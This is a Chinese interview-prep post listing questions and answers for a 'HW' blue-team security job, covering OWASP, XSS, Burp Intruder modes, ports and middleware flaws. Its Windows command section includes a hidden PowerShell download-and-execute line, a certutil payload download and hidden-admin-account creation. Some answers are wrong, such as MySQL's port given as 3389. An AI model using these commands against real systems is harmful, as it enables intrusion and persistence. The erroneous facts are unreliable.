2021记一次hw蓝队招聘一面
2021记一次hw蓝队招聘一面
-
-
-
- 首先问一下以后就业想去哪个城市,什么岗位。
-
- 1.什么是hw行动,蓝队主要工作是什么
- 2.什么是owasp,owasp top10漏洞有什么
- 3.xss都有什么,能简单说一下dom型 xss吗?
- 4.burp说一下都有什么模块,还有爆破的4个模式都是什么
- 5.windows的基础命令和linux的基础命令
- 6.都有什么内网环境,系统什么的
- 7.docker是什么?常用命令都有什么?怎么用docker搭建环境?
- 8.漏洞复现过没?讲一下流程,vulhub怎么弄?
- 9. 永恒之蓝讲一下,怎么利用
- 10.java反序列化漏洞知道吗?什么是序列化和反序列化
- 11.三大java框架是什么?漏洞什么的
- 12.常见端口都有什么?重点数据库端口
- 13.mysql和oracle了解吗?什么是关系型和非关系型
- 14.讲一下渗透流程吧
- 15.python讲一下写过那些工具,然后用到那些模块都是做什么的
- 16.java都知道吗?写过什么工具
- 17.中间件的都有那些,常见漏洞有什么
- 18.
-
-
首先问一下以后就业想去哪个城市,什么岗位。
1.什么是hw行动,蓝队主要工作是什么
护网行动是国家应对网络安全问题所做的重要布局之一。随着大数据、物联网、云计算的快速发展,愈演愈烈的网络攻击已经成为国家安全的新挑战。国家关键信息基础设施可能时刻受到来自网络攻击的威胁。网络安全的态势之严峻,迫切需要我们在网络安全领域具备能打硬仗的能力,“护网行动”应运而生。
简单来说就是,以国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。并以此为契机和抓手,推动网络安全各项工作再上新台阶
蓝队就是日志分析,手段反制,信息研判等等,别让你所在企业丢分就行了,异常ip流量及时上报,封,封,封,不扯了,具体百度一下
2.什么是owasp,owasp top10漏洞有什么
(1)SQL 注入防护方法:
(2)失效的身份认证和会话管理
(3)跨站脚本攻击 XSS
(4)直接引用不安全的对象
(5)安全配置错误
(6)敏感信息泄露
(7)缺少功能级的访问控制
(8)跨站请求伪造 CSRF
(9)使用含有已知漏洞的组件
(1))未验证的重定向和转发
3.xss都有什么,能简单说一下dom型 xss吗?
1.反射型
2.存储型
3.Dom-based型
客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行,如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。
4.burp说一下都有什么模块,还有爆破的4个模式都是什么
- Dashboard(仪表盘)
- Target(目标)
- Proxy(代理)
- Intruder(侵入)也就是爆破
- Repeater(重放)
- Sequencer(序列器)
- Decoder(解码器)
- Comparer(比较)
- Extender(扩展)
- Project options(项目选项)
- Options(用户选项)
爆破四个模式:
Sniper:狙击手 如果2个变量,先固定 第二个值爆破A,然后 在固定 第一个值爆破2
例如 原数值number1=10 ,number2=20 变量设置数字1-3 (payload只能1个)
number1=1 number2=20
number1=2 number2=20
number1=3 number2=20
number1=10 number2=1
number1=10 number2=2
number1=10 number2=3
Battering ram:攻城锤 2个或者多个变量同时用一个payload同时改变(一个变量同时使用)
例如 原数值number1=10 ,number2=20 变量设置数字1-3 (payload只能1个)
number1=1 number2=1
number1=2 number2=2
number1=3 number2=3
Pitchfork:叉子 多个变量各自用自己的payload值爆破(payload相互独立)
例如 原数值number1=10 ,number2=20 变量设置数字1-3 (变量几个 payload几个) 变量1为 1-3 变量2 为 6-8
number1=1 number2=6
number1=2 number2=7
number1=3 number2=8
Cluster bomb:集束炸弹 利用payload1的值轮流与pyload2的值爆破(最全面的)
例如 原数值number1=10 ,number2=20 变量设置数字1-3 (变量几个 payload几个) 变量1为 1-3 变量2 为 6-8
number1=1 number2=6
number1=2 number2=6
number1=3 number2=6
number1=1 number2=7
number1=2 number2=7
number1=3 number2=7
number1=1 number2=8
number1=2 number2=8
number1=3 number2=8
5.windows的基础命令和linux的基础命令
Windows:
type 显示文本内容 type 1.txt
dir 显示当前目录内容
dir/s/b 查询文件 返回绝对路径,例如 dir/s/b d:\a.php 查询D盘中a.php文件返回绝对路径
dir c:\ /s /b *.txt 查询c盘中txt文件,并返回绝对路径
/b 显示文件夹或文件的名字
/s 显示指定目录和所有子目录中的文件
* 是通配符,可以代表任意字符串
del 删除文件
ipconfig 查看IP地址
ipconfig /all 查看所有ip配置信息
net user 查看用户
net user ad 查看用户权限 ad为用户名
net user username password /add username 和password为你要添加的账号和密码
net user username$ password /add 隐藏用户
net user username /del 删除 或者username$ 删除隐藏
net localgroup administrators username /add username为要添加管理员组别的用户
net localgroup administrators 查看所有用户包括隐藏
query user || qwinsta 查看管理员是否在线
tasklist /svc | find "Ter",假如 TermService 的 PID 是 1592。查找远程桌面端口
netstat -ano | find "1592",查看 TermService 使用的端口,如示例中的 3389
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.1/powershell.txt'))"
powershell 隐藏执行下载脚本
certutil.exe -urlcache -split -f “文件下载地址” d:\test.exe 将文件下载到d盘命名为test.exe
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件
Linux:
service iptables status 查看防火墙状态
service iptables start 开启防火墙
service iptables stop 关闭防火墙
service iptables restart 重启防火墙
6.都有什么内网环境,系统什么的
7.docker是什么?常用命令都有什么?怎么用docker搭建环境?
8.漏洞复现过没?讲一下流程,vulhub怎么弄?
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
这个环境应该都了解,虽然不经常复现,还是知道的,一键创建环境,复现方便得很
官网,https://vulhub.org/ --------要学习 自己去看看吧
9. 永恒之蓝讲一下,怎么利用
Ms17-010这个经典漏洞,不用说太多,直接说过程,msf说一下过程就可以了,这个简单,还问了一下rhost和lhost什么意思,这个也简单,永恒之蓝具体的可以百度,这个太多了
10.java反序列化漏洞知道吗?什么是序列化和反序列化
11.三大java框架是什么?漏洞什么的
三大框架:Struts+Hibernate+Spring
java三大框架主要用来做WEN应用。
Struts主要负责表示层的显示 Struts2是apache项目下的一个web 框架
Spring利用它的IOC和AOP来处理控制业务(负责对数据库的操作)
Hibernate主要是数据持久化到数据库
- Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts
2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts
2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大
S2-016 远程代码执行漏洞
S2-045 远程代码执行漏洞(CVE-2017-5638)
S2-046 远程代码执行漏洞
S2-048 远程代码执行漏洞
S2-052 远程代码执行漏洞(CVE-2017-9805)
S2-053 远程代码执行漏洞
S2-057远程代码执行漏洞(CVE-2018-11776)
等等漏洞。就写部分
12.常见端口都有什么?重点数据库端口
21 ftp ftp的端口号20、21的区别一个是数据端口,一个是控制端口,控制端口一般为21
69 TFTP (简单文件传输协议)
22 SSH
23 Telnet
80 web
80-89 web
443 https SSL心脏滴血
445 SMB ms17-010永恒之蓝
873 Rsync未授权
1433 MSSQL
1521 Oracle 这玩应记不住?记不住?
3306 MySQL
3389 远程桌面
5432 PostgreSQL
5900 vnc 目前常用的协议有VNC/SPICE/RDP三种 、小巧,支持客户端和服务器端的直接拷贝粘贴,缺点:速度最慢
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
8080 tomcat/WDCP主机管理系统,默认弱口令
8080,8089,9090 JBOSS
Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,
默认端口是8080
在windows系统中:
1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中
8080端口在/jboss/server/default/deploy/jboss-web.deployer/server.xml中
8093端口在/jboss/server/default/deploy/jms/uil2-service.xml中。
8000-9090 都是一些常见的web端口
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50070,50030 hadoop默认端口未授权访问
161 SNMP
389 LDAP
512,513,514 Rexec
1025,111 NFS
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3312/3311 kangle主机管理系统登陆
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
7778 Kloxo主机控制面板登录
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
50000 SAP命令执行
部分参考csdn一位师傅的,自己整理一些
13.mysql和oracle了解吗?什么是关系型和非关系型
mysql 端口3389
Oracle 端口1521
- 关系型数据库是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。简单说,关系型数据库是由多张能互相连接的表组成的数据库。
一. 优点
1)都是使用表结构,格式一致,易于维护。
2)使用通用的 SQL 语言操作,使用方便,可用于复杂查询。
3)数据存储在磁盘中,安全。
二. 缺点- 读写性能比较差,不能满足海量数据的高效率读写。
- 不节省空间。因为建立在关系模型上,就要遵循某些规则,比如数据中某字段值即使为空仍要分配空间。
- 固定的表结构,灵活度较低。
常见的关系型数据库有 Oracle、DB2、PostgreSQL、Microsoft SQL Server、Microsoft
Access 和 MySQL 等。
- 非关系型数据库又被称为 NoSQL(Not Only SQL ),意为不仅仅是
SQL。通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定。
一. 优点- 非关系型数据库存储数据的格式可以是 key-value
形式、文档形式、图片形式等。使用灵活,应用场景广泛,而关系型数据库则只支持基础类型。 - 速度快,效率高。NoSQL 可以使用硬盘或者随机存储器作为载体,而关系型数据库只能使用硬盘。
- 海量数据的维护和处理非常轻松。
- 非关系型数据库具有扩展简单、高并发、高稳定性、成本低廉的优势。
可以实现数据的分布式处理。
二. 缺点
非关系型数据库暂时不提供 SQL 支持,学习和使用成本较高。
非关系数据库没有事务处理,没有保证数据的完整性和安全性。适合处理海量数据,但是不一定安全。
功能没有关系型数据库完善。
- 非关系型数据库存储数据的格式可以是 key-value
常见的非关系型数据库有 Neo4j、MongoDB、Redis、Memcached、MemcacheDB 和 HBase 等。
摘抄于公众号: MySQL和Python学习
14.讲一下渗透流程吧
15.python讲一下写过那些工具,然后用到那些模块都是做什么的
16.java都知道吗?写过什么工具
17.中间件的都有那些,常见漏洞有什么
.
-
IIS
-
iis6解析漏洞,iis7解析漏洞,put任意文件上传,iis短文件名等
-
.asp;.jpg 当成Asp解析 *.asp/目录下的所有文件当成Asp解析
-
Apache 未知扩展名解析漏洞(默认从后向前解析,一直解析到认识的拓展名) Apache HTTPD
换行解析漏洞CVE-2017-15715
Nginx
Tomcat
Jboss
Weblogic
GlassFish
WebSphere